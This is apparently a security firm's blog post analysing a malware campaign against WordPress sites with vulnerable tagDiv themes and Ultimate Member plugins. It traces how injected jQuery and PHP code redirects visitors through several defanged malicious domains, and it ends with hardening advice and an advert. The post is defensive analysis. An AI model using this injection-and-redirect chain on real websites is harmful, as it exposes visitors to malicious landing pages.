If you are a WordPress user or just a cyber aware individual, you should have already heard about the recent hacking attacks on websites that host vulnerable tagDiv themes and Ultimate Member plugins. This post is a deeper dive that aims to add insights on the malware and analyse the redirection flow. For background and original information we recommend these great posts by Sucuri and inmotionhosting.

The files targeted by this infection are jQuery.js, multiple *.php files having <head> tag in themes directory. Let's follow the traffic direction system implemented by this malware from the injection and to the final landing page.

Malware planted inside the jQuery had the same goal - load malicious content from src[.]eeduelements[.]com).

After decoding the PHP malware by https://malwaredecoder.com/ we got:

Injected malware performs HTTP GET request to "https[:]//src[.]eeduelements[.]com/get[.]php" that returns https[:]//polonofiex[.]ga/sim[.]js URL. HTTP GET to polonofiex[.]ga using the wget utility returns the following JavaScript code:

t1 variable set to "http[:]//murieh[.]space/?h=930130016_dc950a456f7_100&h_l=&h_5=sub_id_2&h_2=def_sub" which in turn would redirect to either tuniaf[.]com or valusc[.]com

Make sure all your themes and plugins are updated. Harden your website and your server account - see our post on WordPress Hardening. We are not placing here the cleanup steps as the infection can take change variants depending on the malicious campaign settings. If you need help with removing this or any other malware, and the most important with protecting your website from new attacks like the one described above, just select from our anti-malware plans.